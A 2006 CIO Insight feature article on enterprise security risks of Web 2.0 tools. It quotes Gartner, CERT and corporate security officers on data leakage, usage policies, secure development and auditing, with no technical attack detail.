Making Web 2

By CIOinsight  |  Posted 09-15-2006

Field Report: Security in the World of Web 2.0

If you haven't heard the hype around Web 2.0, you've been living under a rock. Wikipedia is one of the most popular sites on the Web. There are more than 52 million blogs. And the research firm Gartner Inc. recently added Web 2.0 to its ubiquitous emerging technologies hype cycle, predicting widespread adoption within two years. In light of the success of startups like MySpace, YouTube and Digg, Dan Gillmor, director of the Center for Citizen Media, CIO Insight columnist and author of We the Media: Grassroots Journalism by the People, for the People (O'Reilly Media, 2004), says, "If I were a shareholder of a company that's not wondering about how it can use Web 2.0 more effectively, I would sell my stock."

In its most basic sense, Web 2.0 refers to any tool or application that's delivered over the Internet and allows people to interact—by contributing, editing and sharing content. Instead of merely putting static content on a Web site (Web 1.0), the Internet is now delivering applications and tools that allow users to participate (Web 2.0). But Web 2.0 goes beyond even that. Does your company use any type of software as a service? That's Web 2.0. And if you're designing a service-oriented architecture, that's Web 2.0, too. "Companies are looking at Web 2.0 as a new medium," says Amrit Williams, an analyst at Gartner. "It's an opportunity to innovate and create new revenue."

That may be true, but Web 2.0 is also an opportunity for hackers and others who seek to do harm to the enterprise. "Any time there is a new advancement in technology, there is a new set of security problems," says Williams. And those problems are different from the ones that have traditionally plagued the enterprise. Here's why: Web services are often complex JavaScript applications that run through a browser and access data stored locally on an end user's computer. Because the data and applications aren't constantly being pulled from a central server, they run much more rapidly. The downside? Data is no longer properly protected. What's more, in the rush to put these new tools in place, security is often an afterthought, making the applications themselves vulnerable to attack.

"Imagine I have a Web 2.0 app that's an e-mail client, downloaded in Java onto my system," says Tom Longstaff, deputy director of technology at Carnegie Mellon University's CERT Coordination Center, which studies Internet security vulnerabilities. "The messages are cached locally. And because that client is not on my company's server, it's not as well protected. So along comes another application that attacks the e-mail client and gains access to my cached messages—and my system." Another scenario: A banking employee uses a Web service for complex calculations of sensitive data. "If you are interacting with other Web pages you have visited, an advanced phishing attack could be launched that captures that data without the user even knowing it," Longstaff says.

And because most companies don't have visibility down to each individual desktop computer, monitoring vulnerabilities is practically impossible. "When you are running programs on a server and have control over the environment, you can monitor network activity," Longstaff says. But with Web 2.0, the attacks are against individual computers. "What's really going on," says Gartner's Williams, "is that firms are now creating services outside their corporate perimeters that allow interaction from stakeholders on the Internet. As a result, they are losing visibility over their security."

Already, viruses have threatened Web 2.0 services like MySpace, which was taken down for two full days in October 2005. The threat to the enterprise has remained small—so far. "But hackers are still learning," says Longstaff. And with the growing ease of creating new Web sites, "the ability for people to post malicious tools is also easier," Williams says.

Ironically, most companies that have spent the past decade hardening their perimeter security are now finding they need to punch holes in their firewall to allow for Web 2.0 applications. And in this new reality, they're not just worrying about bad guys getting in. At Wilson & Company Inc., an Albuquerque, N.M.-based engineering firm, Director of IT Ray Benegas says the bigger issue is keeping sensitive data from leaking out. "As a company, we have to acknowledge the existence of these new technologies," he says. "Internally, these tools are necessary for collaboration, and we try to control them without hampering creativity. But we need to control and secure the environment." As a result, Benegas' firm recently revamped its policies around exactly what information can be shared. "We have specific internal policies that explain acceptable use, and how we expect our staff to behave." So far, he says, the policies have been effective.

Next page: Making Web 2.0 Secure

Making Web 2

.0 Secure">

A thoroughly crafted set of policies is absolutely essential, says Gillmor of the Center for Citizen Media. "If companies have a clear policy on what bloggers are not supposed to do, they can avoid a lot of the problems to start with," he says. But enforcement is important, too, says Josh Kessler, an analyst at Boston-based research firm TowerGroup Inc. "Your employees are an incredible threat to security because they have access to your data," he says. "Without appropriate efforts to control that, a policy means nothing. You really need some kind of enforcement." Vendors such as Covelight Systems Inc., Vontu Inc., SmartLine Inc. and others sell software that allows companies to tag important data so that it is constantly monitored, to ensure it never goes beyond the corporate firewall.

That's all fine and good. But when it comes to making Web 2.0 truly secure, experts agree the most important measure is to bake security into the applications themselves. "The first thing a CIO must do is make security a priority of the application development team," says Gartner's Williams. "There must be a stage in the development cycle where they validate the security of an application before they expose it." That means adding auditing and tracking capabilities into software so suspicious behavior can be monitored.

If a third-party vendor hosts your software, make sure their security practices are transparent. Consider doing SAS 70 audits, which were developed by the American Institute of Certified Public Accountants to give vendors a way to document security processes for compliance with regulations such as Sarbanes-Oxley. Though helpful, these audits only validate that controls are in place—they don't look for actual weaknesses. Companies will want to take it a step further, performing penetration assessments and other security tests on their own.

At Motorola Inc., based in Schaumberg, Ill., Chief Information Security Officer Bill Boni says Web 2.0 application developers go through a training program to ensure they understand their security responsibilities. "In the urge to produce quickly, there is an all-too natural tendency to just get it done, to prove the application does what it's supposed to do," Boni says. "Developers look at the use cases, but not the abuse cases." Boni's security team provides testing and verification of all Motorola's Web 2.0 applications. "You need to have trustworthy advisors, either inside or outside the organization, so you can have reasonable assurances that the platform not only performs, but also does not contain easily exploitable vulnerabilities," he says.

And it's important to get a handle on the security of these new Web 2.0 tools now, because the growing proliferation of wireless networks will only make things more complex. "Mobility increases the attack surface area of a company, and I think the combination of that and these new tools will require a lot of attention in the near term," says Boni.

However Web 2.0 develops, the need to consider security is more essential than ever before. "These new applications will help companies differentiate," says Williams. "But we don't want security to become something that inhibits innovation; we want security to be the reason why we can innovate."

Sidebar: Symantec's David Thompson on the Brave New World of Web 2.0